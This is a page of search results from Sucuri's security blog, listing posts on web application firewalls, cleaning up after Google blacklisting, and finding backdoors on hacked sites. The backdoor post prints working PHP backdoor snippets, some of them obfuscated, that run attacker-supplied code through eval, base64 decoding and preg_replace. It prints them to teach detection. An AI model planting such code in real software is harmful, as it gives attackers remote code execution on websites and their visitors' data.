Search Results for: oscommerce

Virtual Hardening with Sucuri CloudProxy

March 18, 2013 by 1 Comment

If you read our blog you know that we are really open to providing insight into malware infections, remediation and hardening tips. The goal is to help educate website owners where and when we can. Unfortunately, that education only goes so far. We have learned that when it comes to hardening no single environment is the same and what you tell one person doesn’t necessarily apply to another person.

Take into consideration three of the simple things we tell website owners that use the WordPress platform:

  • Restrict wp-admin access for only certain white listed IP addresses
  • Disable PHP execution inside the uploads directory
  • Disable direct PHP execution inside the whole wp-content directory whenever possible

Although effective for many of them, most are unable to apply them. Reasons include things like static versus dynamic IP’s and lack of understanding of the use of secure tunnels and static IPs proxies. Then you have the challenges of web servers, is it a Windows IIS web server, or an Apache web server? Is it something else? And what if the environment is a hybrid with varying elements, each with specific considerations.

The same applies to guidance we provide other content management system (CMS) applications like Joomla, Magento, vBulletin, osCommerce and many others. The fact of the matter is that it’s hard to provide one solid solution that all website owners, regardless of platform, can use and employ to harden their websites.

Hardening is HARD

The main issue with hardening is that not everyone is technical enough to follow or understand the guidance. Especially when they see long posts like this one: WordPress Security – Cutting Through The BS or WordPress and Server Hardening – Taking Security to Another Level. The reality is that every one of the configuration changes is one potential new headache for the website owner. What works for one, doesn’t work for the other. Perhaps a host doesn’t allow a specific directive or disables specific functions. How do you account for that when talking to the masses?

Then you have to keep up with the growing threats. Is there a new attack vector? Is there a new hardening tip to address that vector? How do you know? How do you apply the hardening in time to avoid becoming vulnerable and exploited?

Enter Virtual Hardening

In our previous post, we talked about the concept of virtual patching: Virtual Patching for Websites with Sucuri CloudProxy, it is the idea that a non-patched web site can still be protected (patched) by a web application firewall (our CloudProxy).

Fortunately, the benefits of our CloudProxy does not stop there. By default, every site under our CloudProxy is already hardened without any work. In our WordPress plugin we have the 1-click hardening. That’s the no-click hardening. You no longer need to run any security plugin or modify your configuration, since all the hardening is done “virtually” by our WAF.

You can automatically restrict access to your administration panel per IP address. All direct access to non-allowed directories are blocked. And all the steps we provide in our blogs are implemented there to all our users.

Go back a few months and look at the Timthumb mass compromise, where thousands of sites were hacked. Any site that was hardened like we recommend would not get hacked through it, even if they had the insecure timthumb installed. And even without any type of virtual patching or custom WAF rule. Just the hardening alone.

That’s what the Virtual hardening offers without any work for web site owners.

If you have questions about virtual hardening, or the Sucuri CloudProxy service, email us at info@sucuri.net and we can get you setup.

Filed Under: cloudproxy, hardening, sucuri, waf Tagged With: , , ,

Virtual Patching for Websites with Sucuri CloudProxy

March 11, 2013 by 5 Comments

All software has bugs, and some bugs can lead to security vulnerabilities. Vulnerabilities can be extremely dangerous when your software is running over the web, allowing anyone to reach and try to attack it. That’s why patching and keeping web applications updated is so important.
Sucuri Cloud Proxy

The reality is there is no shortage of websites running outdated Joomla installs, or outdated WordPress, or name your favorite CMS. There are also plenty of websites running themes/templates with known vulnerabilities, or forgotten plugins that are being exploited in the wild. The #1 excuse for keeping these web applications outdated is that their websites will break.

We often hear things like “My theme was heavily modified, so I can’t update it”, or “I am afraid it will break some functionality if I update this plugin”, or “I modified core files so now I am stuck”, or even “My web developer left us and nobody knows how this piece of code works”.

Read More

Filed Under: cloudproxy, sucuri, virtual patching, waf Tagged With: , , ,

PSA: December Zero Day’s Announced – MySQL, FreeSSH, Free FTPD

December 3, 2012 by 1 Comment

So it looks like we’re closing out the year in style in 2012. This weekend a number of new, very serious, zero-day vulnerabilities were released for a number of very popular applications – MySQL, FreeSSH, Free FTPD.

MySQL

FTPD

>FreeSSHD

Of the three, the most concerning is obviously MySQL. If you listen to any of our security presentations you know that your application is but one piece of the puzzle, and you environment is a critical component of that puzzle too.

MySQL is integral to any LAMP based application – LAMP = Linux, Apache, MySQL, PHP – this includes many open source content management systems (CMS) like WordPress, Joomla, Drupal, Magento, osCommerce and many more. This is exceptionally dangerous to those environments in which MySQL is being published (i.e., not bound to itself or it’s port open) to the world and applies to VPS and Shared environments alike.

Filed Under: awareness, communications, community, security, vulnerability Tagged With: ,

Google Blacklist Warning: Something’s Not Right Here!

July 5, 2012 by 2 Comments

Google recently put out a post talking to the past 5 years offering the Safe Browsing program and summarized in a post titled: Google Safe Browsing Program 5 Years Old – Been Blacklisted Lately?

This got us thinking about the number of Google warnings end-users see every day, and naturally we couldn’t help but take some time to help provide some context around the different warnings and what they mean.

Today it seems there are 5 little words that all end-users are quickly learning to fear when it comes to owning a website:

Courtesy of Chrome

It’s important to note that every browser displays the warning a bit different. Very frustrating to us and clients, but good to recognize.

Courtesy of Firefox

Courtesy of Safari

What Does it Mean?

What most don’t realize is that Google has a number of different warnings and they don’t all mean the same thing. If you are greeted with one of the warning splash pages above, that’s what it is, your site is infected and you should be concerned. This page is reserved to warn all users visiting your site that Google has in fact confirmed that your site is either (1) distributing malicious software, whether via drive-by-downloads, social engineering attacks, etc.. or (2) redirecting users to malicious domains or IP’s that are in turn distributing malicious software.

I know, nothing screams panic more than a page that is bright RED and forces your client to click proceed anyway or ignore warning to access your website. It’s like saying:

Hey, you’ll likely get mugged if you go in that alley.

The odds of your clients and readers disregarding the message is growing less likely every day. What makes it worse is that Google offers an API that most Anti-Virus leverage. This API is updated with the state of your site in the Google Safe Browsing program. What this in turn means is if your site gets blacklisted, that is then pushed to the API, which in turn is reported by AV’s. In short, if your client is using a product from one of the AV’s that too will warn the user that something is wrong.

Now, its easy to say, “buy our product to avoid what is quickly being recognized as the web’s scarlet letter A,” but in addition to saying that, we want to raise awareness around what you can do if you in fact find yourself with this problem.

Know The Warning

The first thing to understand is to know what warning you are seeing. There are three types of warning Google releases. They include:

  • Malicious Software (Malware)
  • Suspicious Activity
  • Phishing

Malicious Software (Malware)

Perhaps the easiest to identify. They are all the warnings posted above. They are usually red splash pages and annoying as heck, what’s worse is they have this way of significantly impacting your websites traffic.

Suspicious Activity

Most don’t realize this but when you use Google search all the results you see are known as Search Engine Result Pages (SERPs). If Google detects something it feels to be inconsistent with your site it will display a little warning titled:

This site may be compromised!!

This is perhaps the most frustrating because unlike Malware and Phishing attempts, it’s treated differently. It’s Google saying it thinks something is amiss. You’ll often find this warning on sites with the Pharma Hack. Please understand though clearing this warning can be painful as the process is slightly different than its blacklisting counterparts.

Phishing

If you read our post on the past 5 years with Google’s Safe Browsing program you’ll notice an interesting trend where Phishing attempts are increasing while malware is decreasing according to Google. With that, it’s only appropriate for Google to put together yet another glaring splash page to warn its users of something being wrong. If you find yourself curious as to how Phishing scams work HowStuffWorks offers a good and easy to understand description.

With an understanding of which warning you ware being flagged with, and yes it could be all three, you can then put together an appropriate course of action.

Course of Action

The really good news is that its only temporary. We get this question a lot, “Is this going to be there forever?” The answer, fortunately, is no. It’s a temporary warning to the users of the site and if you take appropriate actions it’ll be removed. The first thing to know are the various sites you’ll need:

Here is a quick tip:

You don’t have to hire a company like Sucuri to have these warnings removed.

No company has an advantage over the other getting your site cleared by Google. Google is the only one with the ability to reindex and make the final determination on the state of the site. This means if you are able to effectively clear the infection then there is nothing stopping you from submitting for reconsideration on your own.

Here is another quick tip:

When dealing with Google warnings the best place to go to know the status is Google. Do not depend on Scanners as they use the Safe Browsing API and that is often delayed.

With this information in hand you can now work to assess where the issue is. It’s often in your interest to work to identify the issue before submitting it for reconsideration, not doing so will simply leave you stressed and frustrated. Its important to note that sometimes though, Google does make mistakes, and it could be a false positive.

Step 1. Use Live Scanners / Online Tools

Contrary to popular belief, not all scanners are created equal. More often than not, scanners use some level of caching and/or require you to subscribe to a service to get an output worth anything. Make use of free scanners where possible:

Live scanner:

These free scanners are not 100% accurate, its practically impossible. In reality, no remote service is 100% accurate. If they were, there wouldn’t be a need for any other vendors. That being said, its good to note that some malware types are conditional and present themselves only when specific rules are met. Read more on one of our recent posts, Understanding Conditional Malware – IP Centric Variation. To account for this you can use a number of tools to emulate different conditions in the hopes of replicating the issue.

Online tools:

The idea is try to figure out what might have flagged the issue in the first place. Using the Google Bot option is always good as it will display the site as it is being seen by Google. This is especially important for those infections that target Google IP’.

Step 2. Remove the Issues

As in most things, knowing is only half the battle. Now that you know you want to go in and remove the issue.

Please have a basic understanding of coding syntax, the last thing you want to do is blow up your site all because you deleted a closing bracket.

Please also note that the infection may be encoded, encrypted, concatenated or a little bit of everything. In other words, what you see via the web might not be what you see when you log into your server. With that being said there are a few known places you can always look when hunting down issues:

Some of the more common places to look when dealing with drive-by-downloads:

  • Footer
  • Header
  • Index (php or html)
  • template files

More common places for malicious redirects include:

  • .htaccess
  • index (php or html)
  • Core Files

When dealing with Phishing attempts:

  • New Directories
  • HTML files
  • Index (php or html)

Another good tip is that although Google Webmaster Tools might say myhapylizard.html and mykidsplaying.html are showing infected, in reality its the core file generating the content for those files that is the culprit. Looking only at those HTML files is not going to bear you much fruit. Look at the files generating the template for that page, there you’re likely to find the root of the problem. You’ll also want to know what your website is built on. Is it using a CMS like WordPress, Joomla, Durpal, or osCommerce? Is it custom?

If you’re familiar with the command line interface (CLI) you can also try using a few different commands.

Emulate user agents:

$ curl -A “Mozilla/5.0 (compatible; MSIE 7.01; Windows NT 5.0)” http://www.somesite.com

Where you can switch out the agent MSIE 7.0; Windows NT 5.0 at your leisure. It’s always good to check IE as it’s one of the more likely targeted browsers. If you go online and try searching for user agents it could be a bit overwhelming. As you get familiar with them, here is a sweet little list that will help you get going. Simply replace the content in the user agent section of the cURL command.

You can also use cURL to emulate a number of bots and other crawlers.

Emulate bots:

$ curl –location -D – -A “Googlebot” somesite.com

If you’re wondering why you would ever use cURL in the place of your browser, the answer is simple, you don’t want to visit a compromised site and run the risk of compromising your own environment. You’re going to want some understanding of how your website was developed and a basic understanding of HTML at a minimum. To help you out, you’re looking for things that might have something like the following:

  • iframe
  • script

You’re also going to look for things that don’t make sense:

  • Is your site English, but you see Russian writing? Or any language not your own?
  • Do you see long strings of incomprehensible content?

Once you do that you’ll want to become friends with grep. Sample use would be:

$ grep -r ‘[something of interest]‘ .

Grep is extremely powerful and allows you to crawl your entire environment. It allows you to pick out pieces of text and search for it in every file on your server. Be sure to check out the 15 tips on how to use the command. Another good resource to help you get acclimated in the terminal environment includes this free online resource.

Step 3. Submit For Review

If you made it through Step 2 then you’re likely pretty pumped right now, and you should be. Only thing left to do is submit to Google for reconsideration. Regardless of which warning you’re fighting with, you’re going to do some type of reconsideration submission. For all of them, you’ll need to log into Google Webmaster Tools and verify your site.

For malicious software (Malware) and Phishing warnings you will submit the reconsideration request via Google Webmaster Tools by:

  1. – Add Site
  2. – Verify Site
  3. – Click on Health option – Hint: Left side table of content
  4. – Click on Malware – Hint: If being flagged for Phishing or Malware you’ll see a yellow / orange warning on the page when you click
  5. – Click to submit a review

For suspicious activity you’ll follow these steps:

  1. – Add Site
  2. – Verify Site
  3. – Go to the Reconsideration Link
  4. – Select your site from the drop down
  5. – Fill in the input boxes, provide as much information as possible

After both, the best thing you can do is sit back and wait. This is a patience game. In most instances you’ll see an update within 10 hours, but in some instances it has been known to take days if not weeks (rarely). Also, be sure to keep an eye on your Google Webmaster account, you’ll see update notices there and in your email.

If you get to the point where you have exhausted all your resources and can’t manage to get the infection removed, then it’d be in your interest to engage with a malware remediation company like Sucuri. If you decide on another provider, that’s ok too, be sure to read our Ask Sucuri: What should I know when engaging a Web Malware Company? post.

If you have any questions on the content in this post please feel free to leave a comment or send us an email at info@sucuri.net .

Filed Under: Learn

How To: Lock Your Site by Enabling a Second Layer of Authentication

June 25, 2012 by Leave a Comment

I put together a post this weekend about my personal experience installing a WordPress site on a clean Server. In the process of hardening the administration panel I found myself doing something that I don’t see discussed much – enabling Basic Access Authentication.

That got me thinking about a putting together this post which will help educate our readers on a quick and easy method that can help add a second layer of authentication to their own administrative panels. What’s great about this is it can be applied to any web application that is running on an Apache HTTP Server, those platforms include:

  • WordPress
  • Joomla
  • Drupal
  • osCommerce
  • and more…


Read More

Filed Under: Learn

The Sucuri Learn Blog

May 16, 2012 by Leave a Comment

We have long known that the time was approaching in which we would need to improve our level of engagement with the community and start providing more substantial contributions around managing and securing your websites. We hope to use this blog, Learn Blog, to focus specifically on this challenge, educating our audience, such that through awareness we can improve security postures.

The idea is that our existing blog at blog.sucuri.net will revert back to its core focus of Research and Development (R&D) and other blogs will be created to focus on specific audiences.

The evolving nature of the web ecosystem has it such that its not longer about hiring a webmaster to help manage and administer your website. No, instead technologies like WordPress, Joomla, osCommerce and many others have empowered users to the point where the idea of a webmaster rarely surfaces when discussing the idea of a website. This fact is how the concept of a “Learn” blog came about.

Its about clearly articulating the basics and helping improve the knowledge across the end-user spectrum such that we can work together to combat the growing web-malware problem.

What we hope is to build a repository of knowledge that everyone can benefit from one post at a time.

If you want to know how to do something send us a note at info@sucuri.net, if we find it useful to the masses we’ll draft up a post and share it with the world.

Filed Under: Learn, sucuri

Sucuri is Hiring: Junior Support Analyst

February 24, 2012 by Leave a Comment

Our team is growing and we have an opening for a Junior Support Analyst (remote).

If you have a passion for the web, security, and looking to become part of a dynamic global team, then this is where you want to be.

Job Position: Junior Support Analyst

Description: As a Junior Support Analyst you will be required to troubleshoot web site security issues (learn to fix them), patiently engage with clients, and effectively work and communicate with our global team.

Sucuri employs manual and automated techniques to analyze, decode, and fix web-based malware. The right candidate will have the opportunity to learn and apply these techniques in their day-to-day duties. If you like the challenge of fixing broken websites and reversing the effects of malware, then you’ll love this job.

What we look for:

  • Linux experience – CLI
  • Managing WordPress, Joomla, osCommerce and other CMSs
  • PHP, HTML and shell scripting experience (good, but not required)
  • Open source and community participation
  • Patience with customers
  • Drive to become better, and help us become better
  • Great communication skills with customers, supervisors and peers

*We love to see active community support. If you’re already assisting across the web (WordPress.org, open source project, github, stackoverflow), please include your account name as a reference

Are you ready to make a difference on the web? Send an email with your resume to info@sucuri.net, we’d love to hear from you!

Filed Under: jobs, sucuri Tagged With: ,

ASK Sucuri: What about the backdoors?

September 8, 2011 by 4 Comments

If you have any question about malware, blacklisting, or security in general, send it to us: contact@sucuri.net and we will answer here. For all the “ask sucuri” answers, go here.

Question: What about the backdoors? Why are they so hard to find? How do you guys find them?

When a site gets compromised, one thing we know for sure is that the attackers will leave some piece of malware in there to allow them access back to the site. We call this type of malware, backdoors.

Backdoors are very hard to find because they don’t have to be linked anywhere in the site, they can be very small and be easily confused with “normal” code. Some of them have passwords, some are heavily encrypted/encoded and can be anywhere in your site.

On most online forums, people tell you to search for “eval (base64_decode” and things like that to identify hidden backdoors, but that’s likely not to find everything (and your site will just get reinfected).

For example, on the latest oscommerce compromises, all the sites had the following code added to the application_top.php file:

if (isset($_REQUEST[\'asc\'])) eval(stripslashes($_REQUEST[\'asc\']));

Yes, that is a backdoor. It allows the attacker to execute any type of code, add files, remove files, etc. When you are analysing thousands of lines of code, it is easy to miss it.

What about this one:

wp__theme_icon=create_function(”,file_get_contents(‘/path/wp-content/themes/themename/images/void.jpg’));$wp__theme_icon();

What you think? Yes, another backdoor, but this time the bulk of it is hidden inside an image (void.jpg). See what we mean, by being hard to detect and search for?
 

Fun Quiz: Find the backdoor?

Since backdoors can be in any type or shape, let’s look at some examples:

The “Filesman” backdoor, big, complex and easy to find:

$auth_pass = “63a9f0ea7bb98050796b649e85481845″;
$color = “#df5″;
$default_action = “SQL”;
$default_charset = “Windows-1251″;
$protectionoffer = “ficken”;
preg_replace(“/.*/e”,”\x65\x76\x61\x6C\.. hundreds more lines..

Another simple backdoor, executing any code from the “php” request:

eval (base64_decode($_POST["php"]));

A WordPress-based backdoor. This time, the bad content is hidden inside the database (wp-options tables)

return @eval(get_option(\’blogopt1\’));

A messy backdoor we are seeing in the latest timthumb.php attacks. On this case, all the variables are completely random per case and per file:

>function aknhtkmml3($ur5){$dtuq=’$u’;$pnt=’e6′;$p5zy=’r';$xcl4=’e(‘;$feuh=’od’;$qjka=’dec’;$rhi=’$u’;
$m=’as’;$xcew=’);’;$iw=’_';$jutx=’5=b’;$fwiw=’4′;$zqi=’r';$pwrb=’5′;
eval($rhi.$p5zy.$jutx.$m.$pnt.$fwiw.$iw.$qjka.$feuh.$xcl4.$dtuq.$zqi.$pwrb…
return $ur5;}$sk25=’M3JffC1WcjMrVi1fVHVOKDpoTSIoMGJUNzdXLVZyMytWX1R1Tig6a…

Another messy one. Do you know how the code is executed there? Preg_replace with the “e” modifier actually acts like an “eval”:

>$lllllll=’lllllllll’;
$llllll=”/^.*$/e”;
$llllllll=’ZnVuY3Rpb24gZnVu3STVFNmxObm1V… LONG LINE of code.. dXBoQmRxemtuRE1SSXJwdjUwd3NWUUhrWmV3dWFKbHUvZzVpc1JKa0M1TWF2RFVMV1cwUG1XKzJF
$lllllllll=pack(‘H*’, ’406576616c286261736536345f6465636f646528′).’\$llllllll))’;
preg_replace($llllll, $lllllllll, $lllllll);

Searching for base64_decode? Well, what happens when the attackers do this:

<?php $XKsyG=’as’;$RqoaUO=’e’;$ygDOEJ=$XZKsyG.’s’.$RqoaUO.’r’.’t’;$joEDdb
=’b’.$XZKsyG.$RqoaUO.(64).’_’.’d’.$RqoaUO.’c’.’o’.’d’.$RqoaUO;@$ygDOEJ(@$j
oEDdb(‘ZXZhbChiYXNlNjRfZGVjb2RlKCJhV1lvYVhOelpY…

And those are just some simple examples…

 

So, how to find backdoors?

Finding them is very hard, but inside Sucuri we were able to come up with some techniques that work very well:

  1. White listing. We know how the good files look like. We have a large checksum set of all the core WordPress, Joomla, osCommerce, Wiki, etc, etc files. We also have the checksum for the most popular plugins, modules, extensions and themes. Do you know what that gives us? We know right away if any of the core files were modified (or a new one added) and we can ignore safely the good ones.
  2. Black listing. We also have a list with thousands of backdoors (and their variations) that we have been finding in the last few years.
  3. Anomaly checks. When a file is not in our white list (core files) and not in our blacklist, we do our anomaly checks, where all the functions/variables are analysed and manually inspected to see if they are a backdoor. If it is, we modify our blacklists to catch them in the future, if not, another file to our white list…

So we mix white listing + blacklisting and our own manual analysis to find all the backdoors in a site. If you are trying to clean a compromised site by your self, we recommend first overwriting all the files you can (core files, plugins, etc). Of what is left, you have to analyse manually to make sure it is clean…

What do you think? I would love to hear other ideas to identify backdoors that you guys are using.

Need someone to secure and clean a hacked site? Sign up with us here: http://sucuri,net/signup.

Filed Under: Ask, backdoors, security, sucuri Tagged With: , , ,

WordPress sites with .htaccess hacked

August 17, 2011 by 25 Comments

The TimThumb.php vulnerability is causing a lot of WordPress sites to get compromised with the superpuperdomain.com and superpuperdomain2.com remote JavaScript injection.

However, that’s not all that it is doing. On many of the sites we are analyzing, the .htaccess file is also getting modified to redirect search engine and organic traffic to some Russian domains. Here is what we’re seeing in the compromised .htaccess files:

Read More

Filed Under: hacked, htaccess, Malware, malware_updates, WordPress Tagged With: , , , ,

Non-Stop Attacks Against osCommerce – Time to Take Action

August 16, 2011 by 1 Comment

The malware attacks against osCommerce sites are still going at full force and the site owners have to take action to secure and update their sites as soon as possible. Think about that, with so many valuable targets (online stores) that are not updated and secured, why would they stop attacking now?

*If you have an osCommerce site, please follow these steps to make sure it doesn’t keep getting hacked. You can also scan it to check if it’s clean: Sucuri SiteCheck


Read More

Filed Under: hacked, Malware, malware_updates, oscommerce, vulnerability Tagged With: , , , ,
«Older Posts